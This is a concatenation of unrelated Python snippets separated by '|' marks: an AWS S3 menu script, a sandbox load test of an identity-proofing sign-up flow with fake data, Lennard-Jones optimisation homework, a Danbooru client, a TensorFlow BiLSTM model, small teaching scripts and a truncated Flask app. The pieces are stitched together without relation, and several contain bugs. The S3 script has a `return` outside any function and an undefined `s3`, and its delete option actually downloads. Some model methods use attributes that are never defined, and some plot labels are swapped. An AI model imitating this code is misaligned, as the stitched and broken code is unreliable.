print("AWS S2 services")
print("Choose from the following services 1.create bucket 2.upload a file 3.delete a file")
user_response = int(input("Enter the option number"))
response_check = [1,2,3]
if user_response not in response_check:
print("Enter the valid option")
sys.exit()
if user_response == 1:
bucket_name = input("Enter the bucket name")
bucket_region = input("Enter the region for the bucket")
bucket_obj = AWS(bucket_name)
bucket_obj.create_bucket(bucket_name,bucket_region)
elif user_response == 2:
bucket_name = input("Enter the bucket name in which you wish to upload file")
file_name = input("Enter the file name")
key = input("Enter the name of the file to upload")
bucket_obj = AWS(bucket_name)
bucket_obj.upload_file_into_bucket(file_name, bucket_name, key)
elif user_response == 3:
bucket_name = input("Enter the bucket name in which you wish to upload file")
file_name = input("Enter the file name")
key = input("Enter the name of the file to download")
if s3.bucket_name.creation_date is None:
return True
else:
print("Bucket already exists")
bucket_obj = AWS(bucket_name)
bucket_obj.download_file_from_bucket(file_name, bucket_name, key)
else:
print("Exit")
sys.exit()
|
from faker import Faker
from .flow_helper import (
authenticity_token,
confirm_link,
do_request,
get_env,
otp_code,
personal_key,
querystring_value,
random_phone,
resp_to_dom,
sp_signout_link,
url_without_querystring,
)
from urllib.parse import urlparse
import logging
import os
import time
"""
*** SP IAL2 Sign Up Flow ***
"""
def ial2_sign_up_async(context):
"""
Requires following attributes on context:
* license_front - Image data for front of driver's license
* license_back - Image data for back of driver's license
"""
sp_root_url = get_env("SP_HOST")
context.client.cookies.clear()
# GET the SP root, which should contain a login link, give it a friendly
# name for output
resp = do_request(
context,
"get",
sp_root_url,
sp_root_url,
'',
{},
{},
sp_root_url
)
sp_signin_endpoint = sp_root_url + '/auth/request?aal=&ial=2'
# submit signin form
resp = do_request(
context,
"get",
sp_signin_endpoint,
'',
'',
{},
{},
sp_signin_endpoint
)
auth_token = authenticity_token(resp)
# GET the new email page
resp = do_request(context, "get", "/sign_up/enter_email",
"/sign_up/enter_email")
auth_token = authenticity_token(resp)
# Post fake email and get confirmation link (link shows up in "load test mode")
fake = Faker()
new_email = "test+{}@test.com".format(fake.md5())
default_password = "salty pickles"
resp = do_request(
context,
"post",
"/sign_up/enter_email",
"/sign_up/verify_email",
'',
{
"user[email]": new_email,
"authenticity_token": auth_token,
"user[terms_accepted]": '1'},
)
conf_url = confirm_link(resp)
# Get confirmation token
resp = do_request(
context,
"get",
conf_url,
"/sign_up/enter_password?confirmation_token=",
'',
{},
{},
"/sign_up/email/confirm?confirmation_token=",
)
auth_token = authenticity_token(resp)
dom = resp_to_dom(resp)
token = dom.find('[name="confirmation_token"]:first').attr("value")
# Set user password
resp = do_request(
context,
"post",
"/sign_up/create_password",
"/authentication_methods_setup",
'',
{
"password_form[password]": default_password,
"authenticity_token": auth_token,
"confirmation_token": token,
},
)
auth_token = authenticity_token(resp)
resp = do_request(
context,
"post",
"/authentication_methods_setup",
"/phone_setup",
"",
{
"_method": "patch",
"two_factor_options_form[selection][]": "phone",
"authenticity_token": auth_token,
},
)
# After password creation set up SMS 2nd factor
auth_token = authenticity_token(resp)
resp = do_request(
context,
"post",
"/phone_setup",
"/login/two_factor/sms",
"",
{
"_method": "patch",
"new_phone_form[international_code]": "US",
"new_phone_form[phone]": random_phone(),
"new_phone_form[otp_delivery_preference]": "sms",
"authenticity_token": auth_token,
"commit": "Send security code",
},
)
# After password creation set up SMS 2nd factor
resp = do_request(context, "get", "/phone_setup", "/phone_setup")
auth_token = authenticity_token(resp)
resp = do_request(
context,
"post",
"/phone_setup",
"/login/two_factor/sms",
'',
{
"_method": "patch",
"new_phone_form[international_code]": "US",
"new_phone_form[phone]": random_phone(),
"new_phone_form[otp_delivery_preference]": "sms",
"authenticity_token": auth_token,
"commit": "Send security code",
},
)
auth_token = authenticity_token(resp)
code = otp_code(resp)
logging.debug('/login/two_factor/sms')
# Visit security code page and submit pre-filled OTP
resp = do_request(
context,
"post",
"/login/two_factor/sms",
"/auth_method_confirmation",
'',
{"code": code, "authenticity_token": auth_token},
)
auth_token = authenticity_token(resp)
resp = do_request(
context,
"post",
"/auth_method_confirmation/skip",
"/verify/doc_auth/welcome",
"",
{"authenticity_token": auth_token},
)
auth_token = authenticity_token(resp)
logging.debug('/verify/doc_auth/welcome')
# Post consent to Welcome
resp = do_request(
context,
"put",
"/verify/doc_auth/welcome",
"/verify/doc_auth/agreement",
'',
{"authenticity_token": auth_token, },
)
auth_token = authenticity_token(resp)
logging.debug('/verify/doc_auth/agreement')
# Post consent to Welcome
resp = do_request(
context,
"put",
"/verify/doc_auth/agreement",
"/verify/doc_auth/upload",
'',
{"doc_auth[ial2_consent_given]": "1",
"authenticity_token": auth_token, },
)
auth_token = authenticity_token(resp)
logging.debug('/verify/doc_auth/upload?type=desktop')
# Choose Desktop flow
resp = do_request(
context,
"put",
"/verify/doc_auth/upload?type=desktop",
"/verify/document_capture",
'',
{"authenticity_token": auth_token, },
)
auth_token = authenticity_token(resp)
files = {"doc_auth[front_image]": context.license_front,
"doc_auth[back_image]": context.license_back}
logging.debug('verify/doc_auth/document_capture')
# Post the license images
resp = do_request(
context,
"put",
"/verify/document_capture",
"/verify/doc_auth/ssn",
'',
{"authenticity_token": auth_token, },
files
)
auth_token = authenticity_token(resp)
logging.debug('/verify/doc_auth/ssn')
ssn = '900-12-3456'
resp = do_request(
context,
"put",
"/verify/doc_auth/ssn",
"/verify/doc_auth/verify",
'',
{"authenticity_token": auth_token, "doc_auth[ssn]": ssn, },
)
# There are three auth tokens on the response, get the second
auth_token = authenticity_token(resp, 1)
logging.debug('/verify/doc_auth/verify')
# Verify
expected_text = 'This might take up to a minute'
resp = do_request(
context,
"put",
"/verify/doc_auth/verify",
"/verify/doc_auth/verify_wait",
expected_text,
{"authenticity_token": auth_token, },
)
while resp.url == 'https://idp.pt.identitysandbox.gov/verify/doc_auth/verify_wait':
time.sleep(3)
logging.debug(
f"SLEEPING IN /verify_wait WHILE LOOP with {new_email}")
resp = do_request(
context,
"get",
"/verify/doc_auth/verify_wait",
'',
'',
{},
)
if resp.url == 'https://idp.pt.identitysandbox.gov/verify/doc_auth/verify_wait':
logging.debug(
f"STILL IN /verify_wait WHILE LOOP with {new_email}")
else:
auth_token = authenticity_token(resp)
logging.debug("/verify/phone")
# Enter Phone
resp = do_request(
context,
"put",
"/verify/phone",
"/verify/phone",
'This might take up to a minute',
{"authenticity_token": auth_token,
"idv_phone_form[phone]": random_phone(), },
)
wait_text = 'This might take up to a minute. We’ll load the next step '\
'automatically when it’s done.'
while wait_text in resp.text:
time.sleep(3)
logging.debug(
f"SLEEPING IN /verify/phone WHILE LOOP with {new_email}")
resp = do_request(
context,
"get",
"/verify/phone",
'',
'',
{},
)
if resp.url == 'https://idp.pt.identitysandbox.gov/verify/phone':
logging.debug(
f"STILL IN /verify/phone WHILE LOOP with {new_email}")
else:
auth_token = authenticity_token(resp)
logging.debug('/verify/otp_delivery_method')
# Select SMS Delivery
resp = do_request(
context,
"put",
"/verify/otp_delivery_method",
"/verify/phone_confirmation",
'',
{"authenticity_token": auth_token, "otp_delivery_preference": "sms", },
)
auth_token = authenticity_token(resp)
code = otp_code(resp)
logging.debug('/verify/phone_confirmation')
# Verify SMS Delivery
resp = do_request(
context,
"put",
"/verify/phone_confirmation",
"/verify/review",
'',
{"authenticity_token": auth_token, "code": code, },
)
auth_token = authenticity_token(resp)
logging.debug('/verify/review')
# Re-enter password
resp = do_request(
context,
"put",
"/verify/review",
"/verify/personal_key",
'',
{
"authenticity_token": auth_token,
"user[password]": "salty pickles",
},
)
auth_token = authenticity_token(resp)
logging.debug('/verify/confirmations')
# Confirmations
resp = do_request(
context,
"post",
"/verify/personal_key",
"/sign_up/completed",
'',
{
"authenticity_token": auth_token,
"personal_key": personal_key(resp)
},
)
auth_token = authenticity_token(resp)
logging.debug('/sign_up/completed')
# Sign Up Completed
resp = do_request(
context,
"post",
"/sign_up/completed",
None,
'',
{
"authenticity_token": auth_token,
"commit": "Agree and continue"
},
)
ial2_sig = "ACR: http://idmanagement.gov/ns/assurance/ial/2"
# Does it include the IAL2 text signature?
if resp.text.find(ial2_sig) == -1:
print("ERROR: this does not appear to be an IAL2 auth")
logout_link = sp_signout_link(resp)
logging.debug('/sign_up/completed')
resp = do_request(
context,
"get",
logout_link,
sp_root_url,
'',
{},
{},
url_without_querystring(logout_link),
)
# Does it include the logged out text signature?
if resp.text.find('You have been logged out') == -1:
print("ERROR: user has not been logged out")
|
# Lifo -> last in first out
books = []
books.append("C")
books.append("C++")
books.append("C#")
print(books)
print(books.pop())
print(books)
print(books[-1])
# print(books.pop())
# print(books.pop())
if not books:
print("No books left")
|
import numpy as np
from helpful_functions import *
import scipy.optimize as opt
from nelder_mead import *
def sa1():
"""
Write a function that returns the potential energy U=∑i<j (1/r_ij^12 -1/r_ij^6)
where r_ij is given at the top of p. 581. Apply Nelder–Mead to find the
minimum energy for n=5. Try several initial guesses until you are convinced
you have the absolute minimum. How many steps are required? To help you
check your potential function when n=5, here is one correct input, output
pair. U(1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 0, 1, 0) = -6.0102023319615911
"""
ig = np.array([0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 1, 0])
ig = np.array([-0.2604720088, 0.7363147287, 0.4727061929,
0.2604716550, -0.7363150782, -0.4727063011,
-0.4144908003, -0.3652598516, 0.3405559620,
-0.1944131041, 0.2843471802, -0.5500413671,
0.6089042582, 0.0809130209, 0.2094855133])
# Chilton advised we should use scipy.optimize over his code
res = opt.minimize(U, ig, method='Nelder-Mead')
# check
print("Value should be -6.0102023319615911: ",
U([1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 0, 1, 0]))
print('\nPotential Energy: ', res.fun)
print('Found in ', res.nit, ' iterations.')
print('Translated and rotated configuration: ', res.x)
"""
We used the NElder-Mead function in the Scipy.Optimize library to find the
minimum energey for n=5 nodes to be -9.103852, which is spot on with the
supplied websites value. It took several initial guesses to finally get
this value for the potential energy. After trying at least 10
configurations, we decided to set the initial guess for the nodes to be
the optimal configuration for n=5 nodes given at the website. It did still
take 515 iterations to find our configuration from those initial node
locations, which is peculiar.
"""
return
def sa2():
"""
Plot the five atoms in the minimum energy configuration as circles,
and connect all circles with line segments to view the conformed
molecule. The line segments should form triangles and there should
be three or four lines connecting each atom. You are welcome to use
Python or Mathematica.
"""
# Print optimal graph for website points
# optimal node location for n = 5
# http://doye.chem.ox.ac.uk/jon/structures/LJ/tables.150.html
points = np.array([-0.26047, 0.73631, 0.47271, 0.26047, -0.73632, -0.47271, -0.41449, -0.36526,
0.34056, -0.19441, 0.28435, -0.55004, 0.60890, 0.08091, 0.20949])
plot_configuration(points, 'SA2_Figure1', 'Approximate Solution for $n=5$')
# Print optimal graph for translated points
res = opt.minimize(U, points, method='Nelder-Mead')
points = translate_and_rotate(res.x)
plot_configuration(points, 'SA2_Figure2', 'Approximate Solution for $n=5$ according to RC13')
"""
We first plot the configuration of nodes given from the optimal configuration from
the supplied website. We then plotted the points for the configuration we found in
SA1 where the first point is fixed at the origin and the second point is fixed on
the z-axis.
"""
return
def sa3():
"""
Write a function that returns the gradient of U. Apply a Python
minimization function that uses the function and the gradient for
the n=5 case. Find the minimum energy as before.
To help you check your gradient function when n=5, here is one
correct input, output pair.
∇U(1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 0, 1, 0) = [0.65625, 0.0,
0.65625, 0.65625,0.65625,-1.3125, 0.79891,-1.45516, 0.79891,-1.3125,
0.65625, 0.65625,-0.79891, 0.14266,-0.79891]
"""
# Check
print('Value should be: [0.65625, 0.0, 0.65625, 0.65625, '
'0.65625, -1.3125, 0.79891, -1.45516, 0.79891, -1.3125, '
'0.65625, 0.65625, -0.79891, 0.14266, -0.79891]')
print('Value is: ', grad_U([1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 0, 1, 0]))
ig = np.array([0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 1, 0])
# Set up boundary conditions
b = 1.2
bnds = ((0, 0), (0, 0), (0, 0), (0, 0), (0, 0), (-b, b), (-b, b), (-b, b),
(-b, b), (-b, b), (-b, b), (-b, b), (-b, b), (-b, b), (-b, b))
# Using the L-BFGS-B Method with bounds
x_min_bounded = opt.minimize(U, ig, method='L-BFGS-B', jac=grad_U, bounds=bnds)
points_bounded = x_min_bounded.x
x_min_unbounded = opt.minimize(U, ig, method='L-BFGS-B', jac=grad_U)
points_unbounded = translate_and_rotate(x_min_unbounded.x)
# Print comparison between using bounds and not
print('\nBounded method Potential Energy: ', x_min_bounded.fun)
print('Found in ', x_min_bounded.nit, ' iterations.')
print('Translated and rotated configuration: ', points_bounded)
plot_configuration(points_bounded, 'SA3_Figure1', 'Unbounded Approach $n=5$ using L-BFGS-B')
print('\nUnbounded method Potential Energy: ', x_min_unbounded.fun)
print('Found in ', x_min_unbounded.nit, ' iterations.')
print('Translated and rotated configuration: ', points_unbounded)
plot_configuration(points_bounded, 'SA3_Figure2', 'Bounded Approach $n=5$ using L-BFGS-B')
"""
Due to our results from SA5 we decided to expand this question to not only find
the potential energy using a Scipy.Optimize function using the gradient function
we have written, but also evaluate how including bounds changes the number of
iterations it takes to find the optimal node configuration, and also to see if
this affects the calculated potential energy. We found that using found the
L-BFGS-B method found the potential energy to be -9.103852 in 39 total iterations.
The unbounded approach using the same method found the potential energy to be
-9.103852 in 37 total iterations. As we see their potential energy is just about
the same, despite some machine error we encountered. The actual optimal potential
energy for a configuration of 5 nodes is -9.103852, so both approaches were spot
on. It is interesting, however not surprising to see that following an unbounded
approach was more efficient. Though obvious, we must note that the node
configurations are different.
"""
return
def sa4():
"""
Use one of the functions in SciPy Optimization to find the global minimum
of your potential function when n=5 using only the potential function itself(
not the gradient). You cannot use Nelder-Mead for this.
"""
ig = np.array([0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 1, 0])
# Using the Powell Method
x_min = opt.minimize(U, ig, method='Powell')
# translate and rotate configuration
points = translate_and_rotate(x_min.x)
print('Potential Energy: ', x_min.fun)
print('Found in ', x_min.nit, ' iterations.')
print('Translated and rotated configuration: ', points)
return
def sa5():
"""
Apply the methods used in (1), (3), and (4) when n=6. Rank the methods
according to reliability and efficiency.
"""
# optimal node location for n = 6
# http://doye.chem.ox.ac.uk/jon/structures/LJ/tables.150.html
ig = np.array([0.7430002202, 0.2647603899, -0.0468575389, -0.7430002647, -0.2647604843, 0.0468569750,
0.1977276118, -0.4447220146, 0.6224700350, -0.1977281310, 0.4447221826, -0.6224697723,
-0.1822009635, 0.5970484122, 0.4844363476, 0.1822015272, -0.5970484858, -0.4844360463])
# (1) Using Nelder-Mead
print('\nUsing Nelder-Mead')
x_min_nm = opt.minimize(U, ig, method='Nelder-Mead')
print('Potential Energy: ', x_min_nm.fun)
print('Found in ', x_min_nm.nit, ' iterations.')
# (3) Using L_BFGS_B
print('\nUsing L_BFGS_B')
x_min_L_BFGS_B = opt.minimize(U, ig, method='L-BFGS-B', jac=grad_U)
print('Potential Energy: ', x_min_L_BFGS_B.fun)
print('Found in ', x_min_L_BFGS_B.nit, ' iterations.')
# (4) Using Powell
print('\nUsing Powell')
x_min_Powell = opt.minimize(U, ig, method='Powell')
print('Potential Energy: ', x_min_Powell.fun)
print('Found in ', x_min_Powell.nit, ' iterations.')
"""
All the optimizations methods that we used are found in the Scipy.Optimization library.
We used the Nelder-Mead, Powell, and L_FBGS_B methods. We ranked these methods according
to efficiency as follows:
Rank (Efficiency):
1: L_BFGS_B - 4 iterations
2: Powell - 5 iterations
3: Nelder-Mead - 998 iterations,
We then ranked the same methods according to reliability as follows:
Rank (Reliability) (Actual PE = -12.712062):
1: L_BFGS_B - PE: -12.712062
2: Nelder-Mead - PE: -12.712062
3: Powell - PE: -12.712010
You'll noticed that when transitioning from the efficiency ranking to the reliability
ranking, Nelder Mead and Powell have changed places. This is because Nelder-Mead
took considerably more iterations (993), but the calculated potential energy of the
resulting configuration is closer to the exact answer than that of the Powell method.
Originally we rann the L_BFGS_B method with bounds to make sure that the first five
variables were zero as part of the assignment. However this was skewing our results
and the potential energy found through that method was approximately 0.4 off of the
actual value. Instead of including bounds, we decided to run the resulting node
configuration through our translate_and_rotate function, like all the other methods.
"""
return
def sa6():
"""
Plot the six atoms in the minimum energy configuration as circles, and
connect all circles with line segments to view the conformed molecule.
The line segments should form triangles and there should be four lines
connecting each atom. You are welcome to use Python or Mathematica.
"""
# Found this point configuration in sa6 using Powell unconstrained
ig = np.array([0.67965175, 0.23750852, -0.04819455, -0.64271399, -0.23466047,
0.0452073 , 0.1913369 , -0.36966512, 0.57079769, -0.15485331,
0.37379498, -0.57404431, -0.14914537, 0.55118178, 0.40520939,
0.18565026, -0.54732606, -0.4087711])
# Translate and rotate these points according to the required configuration in RC13
points = translate_and_rotate(ig)
# Plot new configuration
plot_configuration(points, 'SA6_Figure', 'Approximate Solution for $n=6$')
"""
We took the optimal configuration of nodes that we found in SA 5 and ran our
translate_and_rotate function first so that the first point would be located
at the origin and the second point would be fixed on the z-axis. We then
plotted this configuration.
"""
return
def sa7():
"""
Determine and plot minimum-energy conformations for larger n. Information
on minimum-energy Lennard-Jones clusters for n up to several hundred is posted
at the link provided, so your answers can be readily checked. You should do at
least n=8.
http://doye.chem.ox.ac.uk/jon/structures/LJ/tables.150.html
"""
# optimal node location for n = 8
ig = np.array([0.2730989500 , 1.1469629952 , -0.3319578813,
-0.4728837298, -0.6223685080, 0.7664213265 ,
-0.9666537615, -0.2393056630, -0.1698094248,
0.6209419539 , -0.3628130566, 0.7094425990 ,
0.8035441992 , 0.1648033307 , -0.2639206823,
-0.1784380914, 0.2412141513 , -0.8077599510,
0.0639788373 , -0.6647479592, -0.2089132333,
-0.1435883576, 0.3362547097 , 0.3064972473 ])
# (Using Powell
print('\nUsing Powell')
x_min_Powell = opt.minimize(U, ig, method='Powell')
print('Potential Energy at n=8: ', x_min_Powell.fun)
print('Number of iterations: ', x_min_Powell.nit)
# Translate and rotate these points according to the required configuration in RC13
points = translate_and_rotate(x_min_Powell.x)
# Plot new configuration
plot_configuration(points, 'SA7_Figure1', 'Approximate Solution for $n=8$')
# optimal node location for n = 14, cause 14 is a good number
ig = np.array([-0.4308428681, 0.3011152165, 1.5395345691,
0.8907978174, -0.2122748336, -0.7483531248,
-0.0007070124, 0.3915249591, -1.1159393395,
-0.1087424289, -0.7253352304, -0.9277291378,
0.5095512108, -0.9887375564, -0.0113705147,
-0.9327094761, -0.0119091729, -0.6060402871,
0.6843305554, 0.8181106238, -0.3158498774,
0.9980943595, -0.0340672328, 0.3707603801,
-0.4435631052, 0.9423569825, -0.2236674601,
-0.6182734178, -0.8637379285, 0.0806931785,
0.0689765876, -0.4413464656, 0.8779993659,
-0.8273192340, 0.1657103512, 0.5084348730,
0.1775943569, 0.6815230386, 0.6887760023,
0.0328126550, -0.0229327514, -0.1172486273])
# Using Powell
print('\nUsing Powell')
x_min_Powell = opt.minimize(U, ig, method='Powell')
print('Potential Energy at n=14: ', x_min_Powell.fun)
print('Number of iterations: ', x_min_Powell.nit)
# Translate and rotate these points according to the required configuration in RC13
points = translate_and_rotate(x_min_Powell.x)
# Plot new configuration
plot_configuration(points, 'SA7_Figure2', 'Approximate Solution for $n=14$')
"""
For n=8 nodes, we started with initial conditions for the optimal node locations given
in the supplied website. After running the Powell optimization method found in the Scipy
Optimize library, we translated and rotated our points accordingly so that the first point
would be located at the origin and the second point would be fixed on the z-axis. We found
that our optimal potential energy of the system is -19.821075, which is considerably close
to the potential energy of the given configuration, which is -19.821429. For n=14 nodes,
we carried out the same process, and found our optimal potential energy of the given system
to be -47.844233, which is also considerable close to potential energy of the given
configuration, which is -47.845157.
"""
return
|
from urllib.parse import urlparse
from starline.sources import Source
from starline.sources.common.booru import BooruDataClient
from starline.model import Post, PostFile, PostMeta
from utils import prepare_logger
log = prepare_logger(__name__)
class DanbooruDataClient(BooruDataClient):
DOMAIN = 'danbooru.donmai.us'
_POST_URL = '/posts/{}'
_POST_API_URL = '/posts/{}.json'
_SEARCH_API_URL = '/posts.json?tags={}'
_LOGIN_URL = '/session/new'
def __init__(self, login: str, api_key: str, *args, **kwargs):
super().__init__(*args, **kwargs)
self._login = login
self._api_key = api_key
def get_post_id(self, url: str):
url_obj = urlparse(url)
return url_obj.path.rpartition('/')[-1]
def get_post(self, post_id: str):
response = super().get_post(post_id)
return self._get_json(response)
def login(self):
headers = {'user-agent': 'OhaioPoster'}
data = {'user': self._login,
'api_key': self._api_key,
'commit': 'Submit'}
self.session.post(self.get_full_url(self._LOGIN_URL), headers=headers, json=data)
class Danbooru(Source):
ALIAS = 'dan'
DATA_CLIENT = DanbooruDataClient
def get_post(self, post_id: str):
post_data = super().get_post(post_id)
pic = self.wrap_picture(post_data)
return pic
def wrap_picture(self, picture_info: dict):
return Post(
file=PostFile(
name=f"{self.ALIAS}-{picture_info['id']}.{picture_info['file_ext']}",
extension=picture_info['file_ext'],
url=picture_info['file_url'],
),
meta=PostMeta(
source=self.ALIAS,
post_id=str(picture_info['id']),
url=self.data_client.get_post_url(picture_info['id']),
authors=set(picture_info['tag_string_artist'].split()),
characters=set(picture_info['tag_string_character'].split()),
copyright=set(picture_info['tag_string_copyright'].replace('_(series)', '').split()),
height=picture_info['image_height'],
width=picture_info['image_width'],
)
)
|
# Given a sum, find if it exists in the list.
# Naive solution would be to use for loops that would require n^2 time
# Second solution is to store list elements in dictionary and use them
# seond approach will run in 2n time, and would require extra memory.
arr_l = [10,3,3,-4,-2,1,3,9]
required_sum = 5
dict_arr_l = {}
for i in arr_l:
dict_arr_l[i]=i
found_sum = 0
for key in dict_arr_l:
first_number = dict_arr_l[key]
second_number = required_sum - first_number
if second_number in dict_arr_l:
found_sum=1
print("({},{}) are present and their sum is equal to required sum {}"
.format(first_number, second_number,required_sum))
if not found_sum:
print("No pair exists") |
mytuple=("veena",25,"arya",65,89,"vinu")
urtuple=("Shamshil",4563)
#print(mytuple)
#print(mytuple)
#print(mytuple[0])
#print(mytuple[1:3])
#print(mytuple[1:])
print(mytuple+urtuple) |
# -*- coding: UTF-8 -*-
import tensorflow as tf
import numpy as np
import pprint
class RNN_Model(object):
def __init__(self, config, is_training=True):
self.keep_prob = config.keep_prob
# self.batch_size = tf.Variable(0, dtype=tf.int32, trainable=False)
self.batch_size = config.batch_size
num_step = config.num_step
class_num = config.class_num # normally 4
embed_dim = config.embed_dim
# self._input_data = tf.placeholder(tf.float32, shape=[None, num_step]) # n_input = embed_dim ?
self._input_data = tf.placeholder(tf.float32, shape=[None, num_step, embed_dim])
# self._targets = tf.placeholder(tf.int64, shape=[None, class_num])
self._targets = tf.placeholder(tf.int64, shape=[None])
self.mask_x = tf.placeholder(tf.float32, [num_step, None])
hidden_neural_size = config.hidden_neural_size
vocabulary_size = config.vocabulary_size
hidden_layer_num = config.hidden_layer_num
# self.new_batch_size = tf.placeholder(tf.int32, shape=[], name="new_batch_size")
# self._batch_size_update = tf.assign(self.batch_size, self.new_batch_size)
# build LSTM network
# lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(hidden_neural_size, forget_bias=0.0, state_is_tuple=True)
# if self.keep_prob < 1:
# lstm_cell = tf.nn.rnn_cell.DropoutWrapper(
# lstm_cell,
# output_keep_prob=self.keep_prob
# )
# cell = tf.nn.rnn_cell.MultiRNNCell([lstm_cell] * hidden_layer_num, state_is_tuple=True)
# # self._initial_state = cell.zero_state(self.batch_size.read_value(), dtype=tf.float32)
# self._initial_state = cell.zero_state(self.batch_size, dtype=tf.float32)
# BiLSTM
lstm_fw = tf.nn.rnn_cell.BasicLSTMCell(hidden_neural_size, forget_bias=1.0, state_is_tuple=True)
lstm_bw = tf.nn.rnn_cell.BasicLSTMCell(hidden_neural_size, forget_bias=1.0, state_is_tuple=True)
if self.keep_prob < 1:
lstm_fw = tf.nn.rnn_cell.DropoutWrapper(
lstm_fw,
output_keep_prob=self.keep_prob
)
lstm_bw = tf.nn.rnn_cell.DropoutWrapper(
lstm_bw,
output_keep_prob=self.keep_prob
)
cell_fw = tf.nn.rnn_cell.MultiRNNCell([lstm_fw] * hidden_layer_num, state_is_tuple=True)
cell_bw = tf.nn.rnn_cell.MultiRNNCell([lstm_bw] * hidden_layer_num, state_is_tuple=True)
self.initial_state_fw = cell_fw.zero_state(self.batch_size, dtype=tf.float32)
self.initial_state_bw = cell_bw.zero_state(self.batch_size, dtype=tf.float32)
# embedding layer
# with tf.device("/cpu:0"), tf.name_scope("embedding_layer"):
# embedding = tf.get_variable("embedding", [vocabulary_size, embed_dim], dtype=tf.float32)
# inputs = tf.nn.embedding_lookup(embedding, self._input_data)
inputs = self._input_data
if self.keep_prob < 1:
inputs = tf.nn.dropout(inputs, self.keep_prob)
# out_put = []
# state = self._initial_state
# out_put_fw = []
# out_put_bw = []
state_fw = self.initial_state_fw
state_bw = self.initial_state_bw
with tf.variable_scope("LSTM_layer"):
# for time_step in range(num_step):
# if time_step > 0:
# tf.get_variable_scope().reuse_variables()
# (cell_output, state) = cell(inputs[:, time_step, :], state)
# out_put.append(cell_output)
# self._final_state = state
# with tf.variable_scope('fw'):
# for time_step in range(num_step):
# if time_step > 0:
# tf.get_variable_scope().reuse_variables()
# (cell_output_fw, state_fw) = cell_fw(inputs[:, time_step, :], state_fw)
# out_put_fw.append(cell_output_fw)
# self.final_state_fw = state_fw
# with tf.variable_scope('bw'):
# inputs = tf.reverse(inputs, [1])
# for time_step in range(num_step):
# if time_step > 0:
# tf.get_variable_scope().reuse_variables()
# (cell_output_bw, state_bw) = cell_bw(inputs[:, time_step, :], state_bw)
# out_put_bw.append(cell_output_bw)
# self.final_state_bw = state_bw
# out_put_bw = tf.reverse(out_put_bw, [0])
# out_put = tf.concat([out_put_fw, out_put_bw], 2)
# for time_step in range(num_step):
# if time_step > 0:
# tf.get_variable_scope().reuse_variables()
((out_put_fw, out_put_bw), (state_fw, state_bw)) = tf.nn.bidirectional_dynamic_rnn(
cell_fw,
cell_bw,
inputs,
initial_state_fw=state_fw,
initial_state_bw=state_bw
)
out_put = tf.concat([out_put_fw, out_put_bw], 2)
out_put = tf.transpose(out_put, [1, 0, 2])
self.final_state_fw = state_fw
self.final_state_bw = state_bw
out_put = out_put * self.mask_x[:, :, None]
with tf.name_scope("mean_pooling_layer"):
out_put = tf.reduce_sum(out_put, 0) / (tf.reduce_sum(self.mask_x, 0)[:, None])
with tf.name_scope("softmax_layer_and_output"):
# softmax_w = tf.get_variable("softmax_w", [hidden_neural_size, class_num], dtype=tf.float32) # weight
softmax_w = tf.get_variable("softmax_w", [hidden_neural_size * 2, class_num], dtype=tf.float32)
softmax_b = tf.get_variable("softmax_b", [class_num], dtype=tf.float32) # bias
self.logits = tf.matmul(out_put, softmax_w) + softmax_b
with tf.name_scope("loss"):
# self.loss = tf.nn.softmax_cross_entropy_with_logits(logits=self.logits + 1e-10, labels=self._targets) # ont-hot represents class
self.loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=self.logits + 1e-10, labels=self._targets) # int represents class
self._cost = tf.reduce_mean(self.loss)
with tf.name_scope("accuracy"):
self.prediction = tf.argmax(self.logits, 1)
# correct_prediction = tf.equal(self.prediction, tf.argmax(self._targets, 1))
correct_prediction = tf.equal(self.prediction, self._targets)
self.correct_num = tf.reduce_sum(tf.cast(correct_prediction, tf.float32))
self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32), name="accuracy")
# add summary
loss_summary = tf.summary.scalar("loss", self._cost)
accuracy_summary = tf.summary.scalar("accuracy_summary", self.accuracy)
if not is_training:
return
self.global_step = tf.Variable(0, name="global_step", trainable=False)
self._lr = tf.Variable(0.0, trainable=False)
tvars = tf.trainable_variables()
grads, _ = tf.clip_by_global_norm(tf.gradients(self._cost, tvars), config.max_grad_norm)
# keep track of gradient values and sparsity (optional)
grad_summaries = []
for g, v in zip(grads, tvars):
if g is not None:
grad_hist_summary = tf.summary.histogram("{}/grad/hist".format(v.name), g)
sparsity_summary = tf.summary.scalar("{}/grad/sparsity".format(v.name), tf.nn.zero_fraction(g))
grad_summaries.append(grad_hist_summary)
grad_summaries.append(sparsity_summary)
self.grad_summaries_merged = tf.summary.merge(grad_summaries)
self.summary = tf.summary.merge([loss_summary, accuracy_summary, self.grad_summaries_merged])
optimizer = tf.train.GradientDescentOptimizer(self._lr)
# optimizer.apply_gradients(zip(grad, tvars))
self._train_op = optimizer.apply_gradients(zip(grads, tvars))
self.new_lr = tf.placeholder(tf.float32, shape=[], name="new_learning_rate")
self._lr_update = tf.assign(self._lr, self.new_lr)
def assign_new_lr(self, session, lr_value):
session.run(self._lr_update, feed_dict={self.new_lr: lr_value})
def assign_new_batch_size(self, session, batch_size_value):
session.run(self._batch_size_update, feed_dict={self.new_batch_size: batch_size_value})
def assign_lr(self, session, lr_value):
# 使用 session 来调用 lr_update 操作
session.run(self._lr_update, feed_dict={self._new_lr: lr_value})
@property
def input_data(self):
return self._input_data
@property
def targets(self):
return self._targets
# @property
# def initial_state(self):
# return self._initial_state
@property
def cost(self):
return self._cost
# @property
# def final_state(self):
# return self._final_state
@property
def lr(self):
return self._lr
@property
def train_op(self):
return self._train_op |
#!/usr/bin/python3
"""this file stes up a simple flask server """
from flask import Flask, escape, render_template
app = Flask(__name__)
@app.route('/')
def hello_route(strict_slashes=False):
""" route for default page """
return ("Hello HBNB!")
@app.route('/hbnb')
def hbnb_route(strict_slashes=False):
""" route for /hbnb """
return ("HBNB")
@app.route('/c/<string:text>')
def c_is_fun(text, strict_slashes=False):
return ("C %s" % text.replace("_", " "))
@app.route('/python/<string:text>')
@app.route('/python/')
@app.route('/python')
def python_is_cool(text='is cool', strict_slashes=False):
""" variable rules for /python"""
